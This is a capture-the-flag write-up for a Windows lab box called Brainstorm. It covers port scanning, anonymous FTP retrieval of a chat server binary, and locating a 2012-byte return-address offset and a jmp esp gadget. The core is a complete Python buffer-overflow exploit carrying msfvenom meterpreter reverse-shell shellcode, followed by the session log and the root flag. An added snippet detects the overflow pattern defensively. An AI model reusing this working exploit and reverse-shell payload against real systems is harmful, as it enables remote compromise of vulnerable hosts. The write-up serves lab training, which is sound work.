Recon
Nmap
# Nmap 7.95 scan initiated Sun Oct 20 12:21:37 2024 as: "C:\\Program Files (x86)\\Nmap\\nmap.exe" --unprivileged -A -T3 -Pn -oN nmap.log 10.10.30.35
Nmap scan report for 10.10.30.35
Host is up (0.34s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
| ftp-syst:
|_ SYST: Windows_NT
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2024-10-19T04:03:40
|_Not valid after: 2025-04-20T04:03:40
| rdp-ntlm-info:
| Target_Name: BRAINSTORM
| NetBIOS_Domain_Name: BRAINSTORM
| NetBIOS_Computer_Name: BRAINSTORM
| DNS_Domain_Name: brainstorm
| DNS_Computer_Name: brainstorm
| Product_Version: 6.1.7601
|_ System_Time: 2024-10-20T05:24:54+00:00
|_ssl-date: 2024-10-20T05:25:16+00:00; 0s from scanner time.
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters): Write a message:
| NULL:
| Welcome to Brainstorm chat (beta)
|_ Please enter your username (max 20 characters):
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Nmap done at Sun Oct 20 12:25:19 2024 -- 1 IP address (1 host up) scanned in 221.98 seconds
FTP
FTP allows anonymous login, so we browse the files and find the chatserver directory:
ftp 10.10.30.35
Connected to 10.10.30.35.
220 Microsoft FTP Service
200 OPTS UTF8 command successful - UTF8 encoding now ON.
User (10.10.30.35:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19 08:36PM <DIR> chatserver
226 Transfer complete.
ftp: 54 bytes received in 0.00Seconds 54000.00Kbytes/sec.
Analysis
Download the two files in the chatserver directory:
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
chatserver.exe
essfunc.dll
226 Transfer complete.
ftp: 32 bytes received in 0.00Seconds 32000.00Kbytes/sec.
ftp> get chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp: 43747 bytes received in 1.68Seconds 26.04Kbytes/sec.
ftp> get essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp: 30761 bytes received in 1.35Seconds 22.85Kbytes/sec.
ftp> bye
221 Goodbye.
The offset to the saved return address is found at position 2012 by debugging with IDA and fuzzing with Python.
chatserver.exe loads essfunc.dll, and this DLL contains several jmp esp instructions. We will use the one at address 0x625014df.
Checking for bad characters turned up none (other than 0x00).
Generate shellcode containing a meterpreter payload with msfvenom and listen on port 1337.
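As an added defender-side example (not part of the original write-up), the following check flags a send to the chat service that has the shape established in this analysis: a message long enough to reach the 2012-byte offset, the little-endian bytes of the essfunc.dll gadget 0x625014df, or a run of NOPs. The NOP-run threshold and the sample payloads are assumed/constructed, not captured traffic.

```python
import struct

# Values from the write-up: the chat service's 20-character username limit,
# the 2012-byte offset to the saved return address, and the jmp esp gadget
# at 0x625014df inside essfunc.dll.
USERNAME_MAX = 20
EIP_OFFSET = 2012
JMP_ESP_GADGET = 0x625014DF
NOP_RUN_THRESHOLD = 8  # assumed: real chat text never carries 8+ NOPs in a row
GADGET_LE = struct.pack("<I", JMP_ESP_GADGET)  # b"\xdf\x14\x50\x62" on the wire

def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of `value` bytes in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def inspect_payload(stage: str, data: bytes):
    """Alert reasons for one client->server send; stage is 'username' or
    'message' (the two prompts the service prints). Empty list = ordinary chat."""
    line = data.rstrip(b"\r\n")
    alerts = []
    if stage == "username" and len(line) > USERNAME_MAX:
        alerts.append(f"username of {len(line)} bytes exceeds the {USERNAME_MAX}-byte limit")
    if len(line) >= EIP_OFFSET:
        alerts.append(f"{len(line)}-byte send reaches the {EIP_OFFSET}-byte return-address offset")
    if GADGET_LE in line:
        alerts.append(f"contains essfunc.dll jmp esp address {JMP_ESP_GADGET:#010x}")
    nops = longest_run(line, 0x90)
    if nops >= NOP_RUN_THRESHOLD:
        alerts.append(f"NOP sled of {nops} bytes")
    return alerts

# Constructed samples, not real captures. The third copies the layout of the
# write-up's buffer but carries int3 (0xCC) bytes where shellcode would sit.
SAMPLES = {
    "benign_username": ("username", b"drake\r\n"),
    "benign_message": ("message", b"hello from the beta\r\n"),
    "overflow_message": ("message",
                         b"A" * EIP_OFFSET + GADGET_LE + b"\x90" * 16 + b"\xcc" * 32 + b"\r\n"),
}

def scan_samples():
    """Run the detector over every sample; returns {name: alerts}."""
    return {name: inspect_payload(stage, data) for name, (stage, data) in SAMPLES.items()}
```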
Exploit
Write the exploit script as follows:
import socket

ip = "10.10.188.182"   # target address at the time the exploit was run
port = 9999            # Brainstorm chat service
prefix = ""
offset = 2012                   # bytes before the saved return address
overflow = "A" * offset
retn = "\xdf\x14\x50\x62"       # 0x625014df, jmp esp in essfunc.dll (little-endian)
padding = "\x90" * 16           # NOP sled in front of the shellcode
payload = ""                    # msfvenom windows/meterpreter/reverse_tcp, LPORT 1337
payload += "\xdb\xcc\xbe\x53\x1f\x62\x9f\xd9\x74\x24\xf4"
payload += "\x5b\x2b\xc9\xb1\x59\x83\xc3\x04\x31\x73\x15"
payload += "\x03\x73\x15\xb1\xea\x9e\x77\xba\x15\x5f\x88"
payload += "\xa4\x24\x8d\x01\xc1\x23\xba\x40\x39\x27\xee"
payload += "\x68\xb2\x65\x1b\x40\x3b\x02\x51\x8a\xcc\xa2"
payload += "\xdc\xec\xe3\x0c\x4c\xcc\x62\xf1\x8f\x01\x44"
payload += "\xc8\x5f\x54\x85\x0d\x16\x12\x6a\xc3\xfe\x57"
payload += "\x26\xf4\x8b\x2a\xfa\xf5\x5b\x21\x42\x8e\xde"
payload += "\xf6\x36\x22\xe0\x26\x3d\xe2\xc2\x96\x40\xc0"
payload += "\x88\x5f\x5a\x63\x47\x2b\x66\x5a\xa7\x9d\x1d"
payload += "\xa8\xdc\x1f\xf7\xe0\x22\xde\x38\x0f\x0f\xe0"
payload += "\x01\x28\xaf\x96\x79\x4a\x52\xa1\xba\x30\x88"
payload += "\x24\x5c\x92\x5b\x9e\xb8\x22\x8f\x79\x4b\x28"
payload += "\x64\x0d\x13\x2d\x7b\xc2\x28\x49\xf0\xe5\xfe"
payload += "\xdb\x42\xc2\xda\x80\x11\x6b\x7b\x6d\xf7\x94"
payload += "\x9b\xc9\xa8\x30\xd0\xf8\xbf\x45\x19\x03\xc0"
payload += "\x1b\x8d\xcf\x0d\xa4\x4d\x58\x05\xd7\x7f\xc7"
payload += "\xbd\x7f\x33\x80\x1b\x87\x42\x86\x9b\x57\xec"
payload += "\xc7\x65\x58\x0c\xc1\xa1\x0c\x5c\x79\x03\x2d"
payload += "\x37\x79\xac\xf8\xad\x73\x3a\x09\x33\x81\xa4"
payload += "\x65\x31\x89\xdd\x4c\xbc\x6f\x8d\xfe\xee\x3f"
payload += "\x6e\xaf\x4e\x90\x06\xa5\x41\xcf\x37\xc6\x88"
payload += "\x78\xdd\x29\x64\xd0\x4a\xd3\x2d\xaa\xeb\x1c"
payload += "\xf8\xd6\x2c\x96\x08\x26\xe2\x5f\x79\x34\x13"
payload += "\x38\x81\xc4\xe4\xad\x81\xae\xe0\x67\xd6\x46"
payload += "\xeb\x5e\x10\xc9\x14\xb5\x23\x0e\xea\x48\x15"
payload += "\x64\xdd\xde\x19\x12\x22\x0f\x99\xe2\x74\x45"
payload += "\x99\x8a\x20\x3d\xca\xaf\x2e\xe8\x7f\x7c\xbb"
payload += "\x13\x29\xd0\x6c\x7c\xd7\x0f\x5a\x23\x28\x7a"
payload += "\xd8\x24\xd6\xf8\xf7\x8c\xbe\x02\x48\x2d\x3e"
payload += "\x69\x48\x7d\x56\x66\x67\x72\x96\x87\xa2\xdb"
payload += "\xbe\x02\x23\xa9\x5f\x12\x6e\x6f\xc1\x13\x9d"
payload += "\xb4\xf2\x6e\xee\x4b\xf3\x8e\xe6\x2f\xf4\x8e"
payload += "\x06\x4e\xc9\x58\x3f\x24\x0c\x59\x04\x37\x3b"
payload += "\xfc\x2d\xd2\x43\x52\x2d\xf7"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
s.send(b"test user\r\n")
print(s.recv(1024))
print("Press any key to send the payload")
input()
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
Run the exploit script and receive a reverse shell:
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
LHOST => tun0
LPORT => 1337
[*] Started reverse TCP handler on 10.2.5.30:1337
[*] Sending stage (176198 bytes) to 10.10.188.182
[*] Meterpreter session 1 opened (10.2.5.30:1337 -> 10.10.188.182:49349) at 2024-10-20 18:23:54 +0700
Read the flag:
meterpreter > cd Desktop
meterpreter > pwd
C:\Users\drake\Desktop
meterpreter > cat root.txt
5b1001de5a44eca47eee71e7942a8f8a
Flag(s)
5b1001de5a44eca47eee71e7942a8f8a